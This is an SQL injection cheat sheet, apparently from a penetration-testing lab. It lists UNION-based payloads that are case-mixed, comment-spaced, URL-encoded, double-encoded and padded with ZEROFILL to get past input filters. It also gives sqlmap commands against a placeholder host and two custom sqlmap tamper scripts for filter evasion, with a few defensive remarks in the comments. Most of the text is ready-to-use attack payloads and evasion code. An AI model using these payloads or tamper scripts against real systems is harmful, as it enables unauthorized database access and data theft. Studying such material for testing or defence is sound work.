SQL

Quick Payloads

' UNION SELECT user(); -- -
' or 'elscustom'='elsFALSE
' or 'elscustom'='elscustom
'/**/UNION/**/SELECT/**/@@version;#
'UNION(select('PoC String'));#
'union(SELECT(group_concat(table_name))FROM(information_schema.columns)where(table_schema=database()));#
'union(SELECT(group_concat(column_name))FROM(information_schema.columns)where(table_name='secretcustomers'));#
"UNION(select('PoC String'));#
"union(SELECT(group_concat(table_name))FROM(information_schema.columns)where(table_schema=database()));#
' UNiOn seLect @@versiOn;#
' uZEROFILLnZEROFILLiZEROFILLoZEROFILLnZEROFILL ZEROFILLsZEROFILLeZEROFILLlZEROFILLeZEROFILLcZEROFILLt ZEROFILL@@ZEROFILLvZEROFILLeZEROFILLrZEROFILLsZEROFILLiZEROFILLoZEROFILLnZEROFILL; ZEROFILL-- ZEROFILL-ZEROFILL
%61%61%61%61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%3b%20%2d%2d%20%2d
%25%36%31%25%36%31%25%36%31%25%36%31%25%32%37%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%34%30%25%34%30%25%37%36%25%36%35%25%37%32%25%37%33%25%36%39%25%36%66%25%36%65%25%33%62%25%32%30%25%32%64%25%32%64%25%32%30%25%32%64
') uZEROFILLnZEROFILLiZEROFILLoZEROFILLn sZEROFILLeZEROFILLlZEROFILLeZEROFILLcZEROFILLt 'PoC'; -- -

SQLMap Payloads

# Options shared by every command below: -u is the target URL, -p user-agent
# restricts testing to the User-Agent header, and --banner requests the DBMS banner.
# Baseline run; --random-agent sends a randomly selected User-Agent value.
sqlmap -u 'http://vulnerablehost/' -p user-agent --random-agent --banner
# Fixed User-Agent string "elsagent"; --technique=B limits the run to boolean-based blind tests.
sqlmap -u 'http://vulnerablehost/' -p user-agent --user-agent=elsagent --technique=B --banner
# --technique=U limits the run to UNION queries. space2comment rewrites spaces as /**/
# comments, so keyword-matching filters have to strip SQL comments before inspecting input.
# --suffix is appended to each payload; --union-char sets the filler value for UNION columns.
sqlmap -u 'http://vulnerablehost/' -p user-agent --random-agent --technique=U --tamper=space2comment --suffix=';#' --union-char=els --banner
# charencode URL-encodes the payload; input has to be decoded before it is inspected.
sqlmap -u 'http://vulnerablehost/' -p user-agent --tamper=charencode --technique=U --banner
# chardoubleencode URL-encodes the payload twice; inspection has to decode until the value stops changing.
sqlmap -u 'http://vulnerablehost/' -p user-agent --tamper=chardoubleencode --technique=U --banner
# Custom tamper script loaded from a file path, with an explicit --prefix and --suffix
# placed around each payload.
sqlmap -u 'http://vulnerablehost/' -p user-agent --technique=U --tamper=/path/to/your/tampering/scripts/fill.py --prefix="notexistant')" --suffix="; -- " --union-char=els --banner

SQLMap Tamper Scripts

Custom:

----------------------------
Camelcase.py
----------------------------
#!/usr/bin/env python
from lib.core.enums import PRIORITY
# Module-level priority attribute, set to the NORMAL member of the imported PRIORITY enum.
__priority__ = PRIORITY.NORMAL
def dependencies():
    """Intentionally does nothing and returns None."""
    return None
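def tamper(payload, **kwargs):
    """
    Rewrite the payload in alternating case (CaMeLcAsE).

    Characters at even positions are upper-cased and characters at odd
    positions are lower-cased. An 'x' that directly follows a '0' is left
    as it is so that hexadecimal literals such as 0x12345 stay intact.

    Args:
        payload: the payload string to transform; may be empty or None.
        **kwargs: accepted but not used by this script.

    Returns:
        The re-cased string, or an empty string when payload is empty or None.

    Detection note: keyword-based input filters need case-insensitive
    matching to recognise this form; parameterized queries remove the
    dependence on filtering altogether.

    >>> tamper('INSERT')
    'InSeRt'
    """
    retVal = str()

    if payload:
        # enumerate() replaces the Python-2-only xrange() index loop, so the
        # script also runs under Python 3.
        for i, char in enumerate(payload):
            if i % 2 == 0:
                # We cannot break 0x12345. The i > 0 guard keeps index -1 from
                # wrapping around to the last character on the first iteration.
                if char == 'x' and i > 0 and payload[i - 1] == '0':
                    retVal += char
                else:
                    retVal += char.upper()
            else:
                retVal += char.lower()

    return retVal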
[+] SQLMAP Payload [+]
# UNION-only run (--technique=U) through the camelcase.py tamper script; --prefix and
# --suffix are the strings placed before and after each payload.
sqlmap -u 'http://vulnerablehost/' -p user-agent --technique=U --tamper=/path/to/your/tampering/scripts/camelcase.py --prefix="nonexistent'" --suffix=';#' --union-char=els --banner
---------------------------
Zerofill.py (the sqlmap commands on this page appear to reference it as fill.py)
----------------------------
#!/usr/bin/env python
from lib.core.enums import PRIORITY
# Module-level priority attribute, set to the NORMAL member of the imported PRIORITY enum.
__priority__ = PRIORITY.NORMAL
def dependencies():
    """Intentionally does nothing and returns None."""
    return None
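def tamper(payload, **kwargs):
    """
    Append the FILL marker after every character of the payload.

    Args:
        payload: the payload string to transform; may be empty or None.
        **kwargs: accepted but not used by this script.

    Returns:
        The payload with FILL inserted after each character (spaces and
        punctuation included), or an empty string when payload is empty
        or None.

    NOTE(review): the output is only meaningful if something downstream
    deletes the marker again, presumably a filter that strips the keyword
    from input; confirm against the target lab. The defensive takeaway is
    that a filter should reject input containing a blocked token rather
    than delete the token, and that queries should be parameterized.

    >>> tamper('INSERT')
    'IZEROFILLNZEROFILLSZEROFILLEZEROFILLRZEROFILLTZEROFILL'
    """
    retVal = str()
    FILL = 'ZEROFILL'

    if payload:
        # Iterating the string directly replaces the Python-2-only xrange()
        # index loop, so the script also runs under Python 3.
        for char in payload:
            retVal += char + FILL

    return retVal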
[+] SQLMAP Payload [+]
# UNION-only run (--technique=U) through the custom tamper script, loaded here as fill.py.
sqlmap -u 'http://vulnerablehost/' -p user-agent --technique=U --tamper=/path/to/your/tampering/scripts/fill.py --banner